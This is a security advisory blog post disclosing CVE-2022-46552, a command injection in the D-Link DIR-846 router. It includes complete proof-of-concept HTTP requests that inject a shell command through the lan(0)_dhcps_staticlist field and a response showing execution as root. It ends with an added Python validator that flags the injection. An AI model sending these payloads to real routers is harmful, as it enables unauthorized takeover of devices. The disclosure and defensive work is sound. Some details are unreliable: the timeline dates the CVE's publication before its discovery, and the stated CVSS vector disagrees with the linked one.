CVE-2022-46552 | D-Link DIR-846 Wireless Router in firmware FW100A53DBR-Retail has a vulnerability that leads to an RCE

Françoa Taffarel
3 min read, Jan 30, 2023

Cybersecurity is a crucial area of the Information Technology sector: incidents in this sector can cause economic disruption, financial losses, geopolitical tensions, and social instability. In addition, since December 2019, due to the mobility restrictions imposed by the COVID-19 pandemic, many companies have extended remote work.

However, working from home pushes the boundary of corporate networks outward, exposing digital assets to new threats and vulnerabilities; consequently, the attack surface keeps growing. Furthermore, access to private networks usually goes through small-office and home-office (SOHO) routers, devices that are potentially weaker than corporate solutions.

In this context, we found CVE-2022-46552: the D-Link DIR-846 Wireless Router running firmware FW100A53DBR-Retail has a vulnerability that leads to an RCE.

Authors

This research project has been conducted by Lab-C2DC — Laboratory of Command and Control and Cyber-security at ITA.

Lourenço Alves Pereira Junior;

Osmany Barros de Freitas; and

Françoa Taffarel Rosário Corrêa.

Vulnerability Description: D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter. This vulnerability is exploited via a crafted POST request.

Authors: Françoa Taffarel Rosário Corrêa, Osmany Barros de Freitas and Lourenço Alves Pereira Junior.

Affiliation: Aeronautics Institute of Technology (ita.br)

Common Weakness Enumeration: CWE-78 — Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

Vendor of the product: D-LINK

Affected product: DIR-846

Affected Version: Firmware DIR846enFW100A53DBR-Retail

Vulnerability Score V3.1: [9.1 High AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H/E:H/RL:U/RC:C/CR:H/IR:H/AR:H/MAV:N/MAC:L/MPR:L/MUI:R/MS:C/MC:H/MI:H/MA:H&version=3.1)

Vulnerability detail: The exploitation method is a command injection through authenticated user input containing shell special characters. The file SetIpMacBindSettings.php (line 79) calls an exec function with only partially sanitized user input, so an authenticated attacker can execute arbitrary commands by sending a maliciously crafted POST request. The HTTP message body is JSON-encoded and carries the lan(0)_dhcps_staticlist key, whose value is a string of comma-separated values. The payload must be placed in the second value, which leads the web server on the D-Link DIR-846 to invoke exec(changename.sh $mac "$(malicious_payload_command)") on the host system.

Timeline:

Vulnerability discovered: 30/11/2022

First contact attempt with vendor: 01/12/2022

CVE ID requested (MITRE): 01/12/2022

Record created (MITRE): 05/12/2022

First vendor response: 08/12/2022

CVE Assignment Team response: 10/01/2023

Second contact attempt with vendor: 01/12/2022

CVE published in the CVE List: 02/02/2022

2. Proof of Concept

Malicious POST Request

```http
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
SOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"
HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285
Content-Length: 171
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7; PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4

{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}
```

First Response

```http
HTTP/1.1 200 OK
X-Powered-By: PHP/7.1.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Connection: close
Date: Thu, 01 Dec 2022 11:03:54 GMT
Server: lighttpd/1.4.35
Content-Length: 68

{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}
```

Getting Data from RCE Request

```http
GET /HNAP1/rce_confirmed HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV; PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1
Upgrade-Insecure-Requests: 1
```

Second Response

```http
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Date: Thu, 01 Dec 2022 23:24:28 GMT
Server: lighttpd/1.4.35

uid=0(root) gid=0(root)
```
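The following Python example is added here and is not part of the advisory or of D-Link's firmware. It shows the strict per-field validation that the partially sanitized lan(0)_dhcps_staticlist value lacks (the mitigation side of the detail above) and, run over HNAP POST bodies such as the PoC request, serves as a detection check; the 4-field "<index>,<name>,<mac>,<ip>" layout of an entry is inferred from the PoC body and is an assumption.

```python
import json
import re

# Field layout of one lan(0)_dhcps_staticlist entry, inferred from the PoC body:
# "<index>,<name>,<mac>,<ip>". Treating the value as a single 4-field entry is an
# assumption of this example. The <name> field is the one the advisory says reaches
# exec(changename.sh $mac "<name>"), so it gets the tightest whitelist.
INDEX_RE = re.compile(r"^\d{1,3}$")
NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,63}$")
MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")
OCTET = r"(25[0-5]|2[0-4]\d|1?\d?\d)"
IP_RE = re.compile(r"^" + OCTET + r"(\." + OCTET + r"){3}$")
# Characters that escape a double-quoted shell argument: $(...), backticks, ;, pipes, redirects.
SHELL_META_RE = re.compile(r'[$`;|&<>\n"\\]')

def check_staticlist(value):
    """Return a list of findings for one staticlist value; an empty list means it is well formed."""
    findings = []
    if SHELL_META_RE.search(value):
        findings.append("shell metacharacter in value")
    fields = value.split(",")
    if len(fields) != 4:
        findings.append("expected 4 comma-separated fields, got %d" % len(fields))
        return findings
    index, name, mac, ip = fields
    for label, pattern, field in (("index", INDEX_RE, index), ("name", NAME_RE, name),
                                  ("mac", MAC_RE, mac), ("ip", IP_RE, ip)):
        if not pattern.match(field):
            findings.append("malformed %s field: %r" % (label, field))
    return findings

def inspect_hnap_body(body):
    """Inspect one HNAP POST body; returns findings for SetIpMacBindSettings, [] if benign or not applicable."""
    try:
        msg = json.loads(body)
    except ValueError:
        return ["body is not valid JSON"]
    settings = msg.get("SetIpMacBindSettings") if isinstance(msg, dict) else None
    if not isinstance(settings, dict):
        return []
    value = settings.get("lan(0)_dhcps_staticlist")
    if not isinstance(value, str):
        return ["lan(0)_dhcps_staticlist missing or not a string"]
    return check_staticlist(value)

# Sample bodies: the first is the PoC body from the advisory, the second is a constructed benign one.
POC_BODY = '{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}'
BENIGN_BODY = '{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,printer,02:42:d6:f9:dc:4e,192.168.0.15"}}'

if __name__ == "__main__":
    for body in (POC_BODY, BENIGN_BODY):
        print(inspect_hnap_body(body) or "clean")
```

The same whitelist applied on the device side, before the value ever reaches exec, would have rejected the PoC entry outright; a proxy or IDS can apply the same check to flag injection attempts against this endpoint.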
